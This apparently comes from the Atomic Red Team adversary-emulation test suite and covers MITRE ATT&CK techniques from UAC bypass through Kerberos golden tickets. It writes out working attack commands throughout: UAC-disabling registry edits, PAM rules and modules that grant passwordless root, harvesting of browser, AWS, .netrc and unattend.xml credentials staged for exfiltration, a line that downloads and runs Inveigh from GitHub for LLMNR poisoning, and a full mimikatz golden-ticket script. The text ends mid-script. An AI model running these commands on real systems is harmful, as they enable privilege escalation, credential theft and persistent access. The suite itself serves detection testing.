https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\33 Akagi64.exe")
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 34
"..\ExternalPayloads\uacme\34 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup commands, which kill the spawned cmd and event viewer processes, only work if run as admin.
Author: James Forshaw
Type: Shell API
Method: Environment variables expansion
Target: \system32\svchost.exe via \system32\schtasks.exe
Component: Attacker defined
Implementation: ucmDiskCleanupEnvironmentVariable
UCM Method: UacMethodDiskSilentCleanup
https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\34 Akagi64.exe")
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 39
"..\ExternalPayloads\uacme\39 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup commands, which kill the spawned cmd and event viewer processes, only work if run as admin.
Author: Stefan Kanthak
Type: Dll Hijack
Method: .NET Code Profiler
Target: \system32\mmc.exe
Component: Attacker defined
Implementation: ucmCorProfilerMethod
UCM Method: UacMethodCorProfiler
https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\39 Akagi64.exe")
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 56
"..\ExternalPayloads\uacme\56 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup commands, which kill the spawned cmd and event viewer processes, only work if run as admin.
Author: Hashim Jawad
Type: Shell API
Method: Registry key manipulation
Target: \system32\WSReset.exe
Component: Attacker defined
Implementation: ucmShellRegModMethod
UCM Method: UacMethodShellWSReset
https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\56 Akagi64.exe")
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 59
"..\ExternalPayloads\uacme\59 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup commands, which kill the spawned cmd and event viewer processes, only work if run as admin.
Author: James Forshaw
Type: AppInfo ALPC
Method: RAiLaunchAdminProcess and DebugObject
Target: Attacker defined
Component: Attacker defined
Implementation: ucmDebugObjectMethod
UCM Method: UacMethodDebugObject
https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\59 Akagi64.exe")
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 61
"..\ExternalPayloads\uacme\61 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup commands, which kill the spawned cmd and event viewer processes, only work if run as admin.
Author: Enigma0x3/bytecode77 derivative by Nassim Asrir
Type: Shell API
Method: Registry key manipulation
Target: \system32\slui.exe, \system32\changepk.exe
Component: Attacker defined
Implementation: ucmShellRegModMethod
UCM Method: UacMethodDebugObject
https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\61 Akagi64.exe")
Description: Disable User Account Control (UAC) for admin by setting the registry key
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin to 0.
[MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/),
[Purple Fox Rootkit](https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit),
[Avaddon Ransomware](https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat)
Description: The following UAC bypass is focused on a registry key under "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" that will trigger a command once wsreset.exe runs.
This bypass is limited to Windows 10 1803/1809 and may not run on Server platforms. The registry modification is where the interest lies.
If successful, the command to run will spawn off wsreset.exe.
[UAC Bypass in Windows 10 Store Binary](https://0x1.gitlab.io/exploit/UAC-Bypass-in-Windows-10-Store-Binary/)
Description: User Account Control (UAC) is a security mechanism for limiting the elevation of privileges, including administrative accounts, unless authorized.
This setting ensures that the elevation prompt is only used in secure desktop mode.
Disable User Account Control (UAC) for secure desktop by setting the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop to 0.
Description: This atomic regarding UACDisableNotify pertains to the notification behavior of UAC. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. The BlotchyQuasar RAT's defense evasion activity of disabling UAC notifications makes it easier for malware and malicious software to execute with elevated privileges. [Article](https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/)
Description: This atomic regarding setting ConsentPromptBehaviorAdmin to 0 configures the UAC so that it does not prompt for consent or credentials when actions requiring elevated privileges are performed by users in the administrators group. This means that any operation that would normally trigger a UAC prompt will proceed automatically without user interaction.
T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Sudo usage
sudo -l
sudo cat /etc/sudoers
sudo vim /etc/sudoers
Description: Common Sudo enumeration methods.
T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Sudo usage (freebsd)
sudo -l
sudo cat /usr/local/etc/sudoers
sudo ee /usr/local/etc/sudoers
Description: Common Sudo enumeration methods.
Prereq: Check if sudo is installed.
if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit 0; fi;
T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Unlimited sudo cache timeout
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
Description: Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.
T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Unlimited sudo cache timeout (freebsd)
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers
sudo visudo -c -f /usr/local/etc/sudoers
Description: Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.
Prereq: Check if sudo is installed.
if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit 0; fi;
T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Description: Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Description: Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
Prereq: Check if sudo is installed.
if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit 0; fi;
T1550.002 - Use Alternate Authentication Material: Pass the Hash
Description: Use Invoke-WMIExec to Pass the Hash
Note: must dump hashes first
[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
T1550.003 - Use Alternate Authentication Material: Pass the Ticket
Description: Requesting a TGT on a remote system and retrieving it locally before requesting a service ticket with it. This is a Pass-The-Ticket attack because the TGT is obtained on the remote system, then used from a different machine (local).
PsExec is used to execute commands on the remote system, and the "C$" admin share is used to retrieve the TGT, so the current user must have admin rights remotely and other PsExec prerequisites must be met.
Prereq: Rubeus must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe"
if (Test-Path "..\ExternalPayloads\rubeus.exe") {exit 0} else {exit 1}
Prereq: PsExec must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe"
if (Test-Path "..\ExternalPayloads\PsExec.exe") {exit 0} else {exit 1}
T1552.001 - Unsecured Credentials: Credentials In Files
Find AWS credentials
find //.aws -name "credentials" -type f 2>/dev/null
Description: Find local AWS credentials from file, defaults to using / as the look path.
T1552.001 - Unsecured Credentials: Credentials In Files
Extract Browser and System credentials with LaZagne
Description: Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
T1552.001 - Unsecured Credentials: Credentials In Files
Access unattend.xml
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
Description: Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended Windows install process.
T1552.001 - Unsecured Credentials: Credentials In Files
Find and Access Github Credentials
for file in $(find /home -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
Description: This test looks for .netrc files (which store GitHub credentials in clear text) and dumps their contents if found.
T1552.001 - Unsecured Credentials: Credentials In Files
Description: Queries to enumerate for PuTTY credentials in the Registry. PuTTY must be installed for this test to work. If any registry
entries are found, they will be displayed.
Description: Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server.
Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
Prereq: AADInternals module must be installed.
if (Get-Module AADInternals) {exit 0} else {exit 1}
Description: Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.
Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
Prereq: AADInternals and ActiveDirectory modules must be installed.
Description: The following Atomic test simulates adding a generic non-malicious certificate to the Root certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. In addition, this Atomic utilizes CertUtil to export the PFX (ExportPFX), similar to what was seen in the Golden SAML attack.
Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
Reference: https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html
Description: Creates a Root certificate and exports it with Export-PFXCertificate PowerShell Cmdlet.
Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-PFXCertificate.
Description: Creates a Root certificate and exports it with Export-Certificate PowerShell Cmdlet.
Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-Certificate.
Description: The following Atomic test will utilize Mimikatz to extract the certificates from the local system My store. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
A successful attempt will stdout the certificates and write multiple .pfx and .der files to disk.
Prereq: Mimikatz must exist on disk at specified location (..\ExternalPayloads\x64\mimikatz.exe)
if (Test-Path "..\ExternalPayloads\x64\mimikatz.exe") {exit 0} else {exit 1}
T1552.005 - Unsecured Credentials: Cloud Instance Metadata API
Azure - Search Azure AD User Attributes for Passwords
Description: This test uses the MSOnline Powershell module to retrieve all user attributes for a specified account, which can sometimes contain unsecured credentials.
Upon successful execution, this test will scan all user attributes for any strings containing "password".
Those unsecured credentials will be output to a text file, as well as the account that they are associated with and the user attribute in which they were found.
See: https://github.com/dafthack/CloudPentestCheatsheets/blob/master/cheatsheets/Azure.md
Prereq: The MSOnline module must be installed.
if (get-command Get-MsolUser -erroraction silentlycontinue){exit 0} else {exit 1}
Description: This test invokes a web request to the default Instance Metadata API of 169.254.169.254 in order to dump the data contained within it to a file.
See: https://www.sans.org/blog/cloud-instance-metadata-services-imds-/
T1552.006 - Unsecured Credentials: Group Policy Preferences
GPP Passwords (findstr)
findstr /S cpassword %logonserver%\sysvol\*.xml
Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux.
Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller.
This test is intended to be run from a domain joined workstation, not on the Domain Controller itself.
The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands.
Successful test execution will either display the credentials found in the GPP files or indicate "No preference files found".
Prereq: Get-GPPPassword PowerShell Script must exist at ..\ExternalPayloads\Get-GPPPassword.ps1
Description: A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services or provide further access to the cluster.
[More information about secrets](https://kubernetes.io/docs/concepts/configuration/secret/).
This test will make a request to the Kubernetes api at the `/api/v1/secrets` endpoint requesting every secret stored within the cluster.
Prereq: kubectl must be installed
which kubectl
T1552.007 - Kubernetes List Secrets
ListSecrets
kubectl get secrets -n default
Description: A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services.
Prereq: kubectl must be installed
which kubectl
T1552.007 - Kubernetes List Secrets
Cat the contents of a Kubernetes service account token file
Description: This atomic runs an API call GetPasswordData from a role that does not have permission to do so. This simulates an attacker attempting to retrieve RDP passwords on a high number of Windows EC2 instances. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ec2-get-password-data/
Prereq: Stratus binary must be present at the specified location ($T1552/src/stratus)
if [ -f $T1552/src/stratus ]; then exit 0; else exit 1; fi;
Prereq: The ~/.aws/credentials file must have a default stanza configured
T1553.003 - Subvert Trust Controls: SIP and Trust Provider Hijacking
SIP (Subject Interface Package) Hijacking via Custom DLL
regsvr32.exe T1553.003\bin\GTSIPProvider.dll
Description: Registers a DLL that logs signature checks, mimicking SIP hijacking. This test uses a DLL from
https://github.com/gtworek/PSBits/tree/master/SIP and registers it using regsvr32, thereby causing
the system to utilize it during signature checks, and logging said checks.
Prereq: GTSIPProvider.dll must exist on disk at specified location (T1553.003\bin\GTSIPProvider.dll)
if (Test-Path "T1553.003\bin\GTSIPProvider.dll") {exit 0} else {exit 1}
Description: The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
Description: Mounts an ISO image downloaded from the internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
Prereq: T1553.005.iso must exist on disk at specified location (T1553.005\bin\T1553.005.iso)
if (Test-Path "T1553.005\bin\T1553.005.iso") {exit 0} else {exit 1}
Description: Mounts an ISO image downloaded from the internet to evade Mark-of-the-Web and runs the hello.exe executable from the ISO.
Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image, which will open a command prompt echoing "Hello, World!".
ISO provided by: https://twitter.com/mattifestation/status/1398323532988399620 Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
Prereq: FeelTheBurn.iso must exist on disk at specified location (T1553.005\bin\FeelTheBurn.iso)
if (Test-Path "T1553.005\bin\FeelTheBurn.iso") {exit 0} else {exit 1}
Description: Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.
Removing this allows more freedom in executing scripts in PowerShell and avoids opening files in protected view.
Prereq: A test file with the Zone.Identifier attribute must be present.
Description: Executes the LNK file document.lnk from AllTheThings.iso. The link file executes cmd.exe and rundll32 in order to load and execute AllTheThingsx64.dll from the ISO, which spawns calc.exe.
Prereq: AllTheThings.iso must exist on disk at specified location (T1553.005\bin\AllTheThings.iso)
if (Test-Path "T1553.005\bin\AllTheThings.iso") {exit 0} else {exit 1}
Description: A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}.
Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of PathToAtomicsFolder\..\ExternalPayloads\sysinternals\passwordsdb.
Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml)
Prereq: Modified Sysinternals must be located at ..\ExternalPayloads
if (Test-Path "..\ExternalPayloads\SysInternals") {exit 0} else {exit 1}
T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
Search macOS Safari Cookies
cd ~/Library/Cookies
grep -q "coinbase" "Cookies.binarycookies"
Description: This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.
Upon successful execution, the macOS shell will cd to `~/Library/Cookies` and grep `Cookies.binarycookies` for the specified value.
T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
LaZagne - Credentials from Browser
"T1555.003\bin\LaZagne.exe" browsers
Description: The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system.
LaZagne is an open source application used to retrieve passwords stored on a local computer.
Prereq: LaZagne.exe must exist on disk at specified location (T1555.003\bin\LaZagne.exe)
if (Test-Path "T1555.003\bin\LaZagne.exe") {exit 0} else {exit 1}
T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
Simulating access to Chrome Login Data
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination "..\ExternalPayloads"
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data For Account" -Destination "..\ExternalPayloads"
Description: Simulates an adversary accessing encrypted credentials from Google Chrome Login database.
Description: Simulates an adversary accessing encrypted credentials from the Firefox web browser's login database.
More info: https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data
Description: Simulates an adversary accessing encrypted credentials from the Edge web browser's login database.
More info: https://www.forensicfocus.com/articles/chromium-based-microsoft-edge-from-a-forensic-point-of-view/
Prereq: Edge must be installed
if (Test-Path "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe") {exit 0} else {exit 1}
Prereq: Edge login data file must exist
if (Test-Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default") {exit 0} else {exit 1}
Description: Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.
Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
Prereq: Visual Studio Build Tools command prompt must exist at C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat
T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
Stage Popular Credential Files for Exfiltration
$exfil_folder = "$env:temp\T1555.003"
if (test-path "$exfil_folder") {} else {new-item -path "$env:temp" -Name "T1555.003" -ItemType "directory" -force}
$FirefoxCredsLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
if (test-path "$FirefoxCredsLocation\key4.db") {copy-item "$FirefoxCredsLocation\key4.db" -destination "$exfil_folder\T1555.003Firefox_key4.db"} else {}
if (test-path "$FirefoxCredsLocation\logins.json") {copy-item "$FirefoxCredsLocation\logins.json" -destination "$exfil_folder\T1555.003Firefox_logins.json"} else {}
if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -destination "$exfil_folder\T1555.003Chrome_Login Data"} else {}
if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account" -destination "$exfil_folder\T1555.003Chrome_Login Data For Account"} else {}
if (test-path "$env:appdata\Opera Software\Opera Stable\Login Data") {copy-item "$env:appdata\Opera Software\Opera Stable\Login Data" -destination "$exfil_folder\T1555.003Opera_Login Data"} else {}
if (test-path "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data") {copy-item "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data" -destination "$exfil_folder\T1555.003Edge_Login Data"} else {}
compress-archive -path "$exfil_folder" -destinationpath "$exfil_folder.zip" -force
Description: This test is designed to search a drive for credential files used by the most common web browsers on Windows (Firefox, Chrome, Opera, and Edge), export the found files to a folder, and zip it,
simulating how an adversary might stage sensitive credential files for exfiltration in order to conduct offline password extraction with tools like [firepwd.py](https://github.com/lclevy/firepwd) or [HackBrowserData](https://github.com/moonD4rk/HackBrowserData).
Description: PowerSharpPack - Sharpweb searching for Browser Credentials technique via function of WinPwn
T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
Simulating Access to Chrome Login Data - MacOS
cp ~/Library/"Application Support/Google/Chrome/Default/Login Data" "/tmp/T1555.003_Login Data"
cp ~/Library/"Application Support/Google/Chrome/Default/Login Data For Account" "/tmp/T1555.003_Login Data For Account"
Description: This test locates the Login Data files used by Chrome to store encrypted credentials, then copies them to the temp directory for later exfil.
Once the files are exfiltrated, malware like CookieMiner could be used to perform credential extraction.
See https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ .
Cleanup:
rm "/tmp/T1555.003_Login Data" >/dev/null 2>&1
rm "/tmp/T1555.003_Login Data For Account" >/dev/null 2>&1
T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
Description: The following Atomic test utilizes WebBrowserPassView to extract passwords from browsers on a Windows system. WebBrowserPassView is an open source application used to retrieve passwords stored on a local computer. It was recently noticed as a tool used in the BlackCat Ransomware.
Prereq: Check if WebBrowserPassView.exe exists in the specified path T1555.003\bin\WebBrowserPassView.exe
if (Test-Path "T1555.003\bin\WebBrowserPassView.exe") {exit 0} else {exit 1}
T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
BrowserStealer (Chrome / Firefox / Microsoft Edge)
Description: [Github Repo](https://github.com/SaulBerrenson/BrowserStealer) Simple password/cookies stealer for Chrome, Edge, and Gecko-based browsers (30 listed working). This attack simulates stealing the data from the browser files and printing it to the command line.
If testing with Firefox and the browser is x64, you need to use the x64 build.
Description: This test simulates an adversary using esentutl to dump encrypted credentials from Google Chrome's Login database.
[Reference](https://actzero.ai/resources/blog/hygiene-tip-shut-down-attackers-harvesting-cached-browser-credentials/)
del /f /q %temp%\T1555.003_Login_Data.tmp > nul 2>&1
T1555.004 - Credentials from Password Stores: Windows Credential Manager
Access Saved Credentials via VaultCmd
vaultcmd /listcreds:"Windows Credentials"
Description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos
https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
T1555.004 - Credentials from Password Stores: Windows Credential Manager
Description: Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
Prereq: The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
if (test-path "..\ExternalPayloads\Get-AzurePasswords.ps1"){exit 0} else {exit 1}
Description: This module will extract the credentials from Windows Credential Manager
T1555 - Credentials from Password Stores
Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]
vaultcmd /listcreds:"Windows Credentials" /all
Description: This module will enumerate credentials stored in the Windows Credentials vault of Windows Credential Manager using the built-in utility vaultcmd.exe
T1555 - Credentials from Password Stores
Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]
vaultcmd /listcreds:"Web Credentials" /all
Description: This module will enumerate credentials stored in the Web Credentials vault of Windows Credential Manager using the built-in utility vaultcmd.exe
Description: The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer.
Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.).
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.
T1555 - Credentials from Password Stores
WinPwn - Loot local Credentials - Wifi Credentials
Description: Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges.
The binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection
Source is in src folder.
This does require a reboot to see the filter loaded into lsass.exe.
It does require Administrative privileges to import the clean registry values back into LSA; you may have to do this manually afterwards for cleanup.
Prereq: AtomicRedTeamPWFilter.dll must exist on disk at specified location (T1556.002\bin\AtomicRedTeamPWFilter.dll)
if (Test-Path "T1556.002\bin\AtomicRedTeamPWFilter.dll") {exit 0} else {exit 1}
Description: lsass.exe loads all DLLs specified by the Authentication Packages REG_MULTI_SZ value.
Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges.
The binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection
Source is in src folder.
This does require a reboot to see the filter loaded into lsass.exe.
It does require Administrative privileges to import the clean registry values back into LSA; you may have to do this manually afterwards for cleanup.
Prereq: AtomicRedTeamPWFilter.dll must exist on disk at specified location (T1556.002\bin\AtomicRedTeamPWFilter.dll)
if (Test-Path "T1556.002\bin\AtomicRedTeamPWFilter.dll") {exit 0} else {exit 1}
sudo sed -i "1s,^,auth sufficient pam_succeed_if.so uid >= 0\n,g" /etc/pam.d/su-l
Description: Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
Cleanup:
sudo sed -i "\,auth sufficient pam_succeed_if.so uid >= 0,d" /etc/pam.d/su-l
Description: Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
sudo sed -i "1s,^,auth sufficient /tmp/pam_evil.so\n,g" /etc/pam.d/su-l
Description: Creates a PAM module, inserts a rule to use it, and then tests it.
Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
Prereq: The PAM development library must be installed to build the PAM module
if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;
Prereq: The PAM module must exist on disk at specified location (/tmp/pam_evil.so)
if [ -f /tmp/pam_evil.so ]; then exit 0; else exit 1; fi;
Cleanup:
sudo sed -i "\,auth sufficient /tmp/pam_evil.so,d" /etc/pam.d/su-l
T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay
LLMNR Poisoning with Inveigh (PowerShell)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/82be2377ade47a4e325217b4144878a59595e750/Inveigh.ps1" -UseBasicParsing)
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -MDNS Y -HTTPS Y -PROXY Y
Description: Inveigh conducts spoofing attacks and hash/credential captures through both packet sniffing and protocol specific listeners/sockets. This Atomic will run continuously until you cancel it or it times out.
T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket
Crafting Active Directory golden tickets with mimikatz
# get current domain SID if default was used
$domain_sid = "S-1-5-21-DEFAULT"
If ($domain_sid -Match "DEFAULT") {
  # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60
  $domain = gwmi Win32_ComputerSystem | Select -Expand Domain
  $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value
  $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))
}
# create batch file with commands to run in a separate "runas /netonly" session
# so we don't purge Kerberos ticket from the current Windows session
# its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
@"
>%TEMP%\golden.txt 2>&1 (
  echo Purge existing tickets and create golden ticket:
  klist purge
  ..\ExternalPayloads\mimikatz\x64\mimikatz.exe "kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:goldenticketfakeuser /ptt" "exit"
  echo.
  echo Requesting SYSVOL:
  dir \\%userdnsdomain%\SYSVOL
  echo.
  echo Tickets after requesting SYSVOL:
  klist
  echo.
  echo End of Golden Ticket attack
)
"@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat
# run batch file in a new empty session (password and username do not matter)
echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null
# wait until the output file has logged the entire attack
do {
  Start-Sleep 1 # wait a bit so the output file has time to be created
  Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object { if ($_ -match 'End of Golden Ticket attack') { break } }
} while ($false) # dummy loop so that 'break' can be used
# show output from new empty session
Get-Content $env:TEMP\golden.txt
Description: Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.
This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
Prereq: Mimikatz executor must exist on disk and at specified location (..\ExternalPayloads\mimikatz\x64\mimikatz.exe)
# create batch file with commands to run in a separate "runas /netonly" session
# so we don't purge Kerberos ticket from the current Windows session
# its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
@"
>%TEMP%\golden.txt 2>&1 (
  echo Purge existing tickets and create golden ticket:
